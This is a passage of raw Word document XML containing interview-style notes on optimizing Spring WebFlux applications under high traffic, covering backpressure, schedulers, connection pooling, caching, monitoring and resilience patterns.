    <w:p w14:paraId="7B721AD9" w14:textId="77777777" w:rsidR="004D21B1"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E94B272">
          <v:rect id="_x0000_i2355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="637CFFCD" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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2. Apply Reactive Backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E36CF" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Backpressure ensures that a fast producer doesn't overwhelm a slow consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18398D27" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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se limitRate(), onBackpressureBuffer(), or onBackpressureDrop() in Flux where necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8BE7F" w14:textId="77777777" w:rsidR="004D21B1"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98EA444">
          <v:rect id="_x0000_i2356" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E10A37" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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3. Optimize Thread Usage with Schedulers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551D865" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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se subscribeOn(Schedulers.boundedElastic()) for blocking tasks (e.g., file I/O).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE74A32" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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se publishOn() to control downstream thread execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57164025" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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void unnecessary context switches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7BF6F" w14:textId="77777777" w:rsidR="004D21B1"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040B147">
          <v:rect id="_x0000_i2357" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67BFB2" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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4. Use Efficient Data Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5031D63F" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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se Flux for paginated or large data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F50CC6" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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void loading all data into memory at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF7D243" w14:textId="77777777" w:rsidR="004D21B1"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6CDDABD6">
          <v:rect id="_x0000_i2358" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A0F03" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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5. Monitor and Tune with Reactive Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EA230" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10B27B" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Track event loop utilization, dropped messages, queue size, and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BBE26" w14:textId="77777777" w:rsidR="004D21B1"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F160FAE">
          <v:rect id="_x0000_i2359" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA8AC0" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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6. Use Gateway Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209C483" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Offload client-specific concerns (rate limiting, retries) using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Gateway</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API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4AA7B" w14:textId="77777777" w:rsidR="004D21B1"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C643F15">
          <v:rect id="_x0000_i2360" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD292C" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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7. Apply Proper Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B13375" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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se onErrorResume(), retry(), timeout(), etc., to build resilient pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FEB5E" w14:textId="77777777" w:rsidR="004D21B1"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CD4DD4D">
          <v:rect id="_x0000_i2361" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC54325" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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8. Enable Load Balancing &amp; Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ADE604" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Deploy WebFlux apps behind a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015DFFCC" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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ince WebFlux uses fewer threads, it benefits from horizontal scaling even more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AEE82" w14:textId="77777777" w:rsidR="004D21B1"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D3A9030">
          <v:rect id="_x0000_i2362" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="200CA9F3" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B1"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9. Avoid Mixing Blocking with Non-Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E0A183" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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Never mix blocking libraries (JDBC, synchronous APIs) with reactive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0F2B2" w14:textId="77777777" w:rsidR="004D21B1" w:rsidRPr="00B13F85" w:rsidRDefault="004D21B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f you must, isolate such operations using Schedulers.boundedElastic().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA84E8"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4203E45">
          <v:rect id="_x0000_i2363" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F97ABF" w14:textId="29982EE8" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="_Toc196308017"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you optimize the performance of a WebFlux application with high traffic</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:p w14:paraId="726D147A" w14:textId="2A441C25" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimize performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux application under high traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, focus on keeping it </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fully non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, tuning </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and building for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive resilience</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's a practical breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB77658" w14:textId="77777777" w:rsidR="006B478D"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9223A39">
          <v:rect id="_x0000_i2364" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243E8B5" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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1. Use Non-Blocking Libraries End-to-End</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62434051"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of RestTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49075817"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R2DBC</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ReactiveMongo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of JDBC/JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB3D14"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void blocking I/O like file reads or third-party SDKs (use Schedulers.boundedElastic() if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F2F01F" w14:textId="77777777" w:rsidR="006B478D"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1208982">
          <v:rect id="_x0000_i2365" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2B685" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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2. Apply Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850DD51"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se .limitRate(n) or .onBackpressureBuffer() in Flux to avoid out-of-memory errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71472D76"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nsure downstream consumers can control the flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7FB2E" w14:textId="77777777" w:rsidR="006B478D"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47E9D0">
          <v:rect id="_x0000_i2366" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C0288" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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3. Threading and Schedulers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9E7B0"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se Schedulers.parallel() for CPU-intensive work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99FAF7"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se Schedulers.boundedElastic() for blocking code (sparingly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DC022"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inimize the number of publishOn/subscribeOn switches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39008921" w14:textId="77777777" w:rsidR="006B478D"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9E1A322">
          <v:rect id="_x0000_i2367" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64999A58" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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4. Optimize Reactive Chains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C301B9"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void redundant operators (e.g., flatMap() inside loops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B261BA8"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void block() or subscribe() manually in service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFFC2D7"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se Mono.defer() or Flux.defer() for deferred execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E27E89" w14:textId="77777777" w:rsidR="006B478D"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03C2FA3">
          <v:rect id="_x0000_i2368" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D0BBC" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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5. Enable Connection Pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A580D74"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For WebClient, use Reactor Netty connection pooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08F308"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HttpClient httpClient = HttpClient.create().compress(true).wiretap(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05605639"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ebClient client = WebClient.builder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD873CA"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clientConnector(new ReactorClientHttpConnector(httpClient))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DEF73C"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build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF6D06" w14:textId="77777777" w:rsidR="006B478D"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FFC4359">
          <v:rect id="_x0000_i2369" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC649CF" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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6. Use Caching Where Possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A60BE"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pply in-memory caches (Caffeine, Guava) or external (Redis) for frequent reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2E2B00"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se .cache() on reactive chains where appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834478A" w14:textId="77777777" w:rsidR="006B478D"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BB0A3F2">
          <v:rect id="_x0000_i2370" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A936DF" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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7. Monitoring &amp; Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAAFCA1"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus/Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA6A74"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onitor metrics like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C2C64C" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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quest latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E2980" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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vent loop blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAEFCF" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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Backpressure signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5ED002" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D" w:rsidP="00B13F85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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rror rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325EC7A7" w14:textId="77777777" w:rsidR="006B478D"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8E4313">
          <v:rect id="_x0000_i2371" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="791E0CDC" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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8. Stress Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E040CC"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Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Artillery</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Gatling</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JMeter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to simulate high traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062282BE"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onitor CPU, memory, and GC behavior under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE6213" w14:textId="77777777" w:rsidR="006B478D"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6AFE04F">
          <v:rect id="_x0000_i2372" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0575CD" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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9. Use Efficient Data Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12851FE7"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For large datasets, use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pagination with Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of returning huge lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1825A003"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void N+1 queries; optimize with reactive joins or batch fetches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76784451" w14:textId="77777777" w:rsidR="006B478D"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43CF737">
          <v:rect id="_x0000_i2373" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE1BE39" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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10. Resilience Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B9901"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se retryWhen(), timeout(), circuitBreaker() (via Resilience4j/Reactor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30397E6D" w14:textId="77777777" w:rsidR="006B478D" w:rsidRPr="00B13F85" w:rsidRDefault="006B478D"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void failing entire chains due to one upstream failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663897E1"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40192A4">
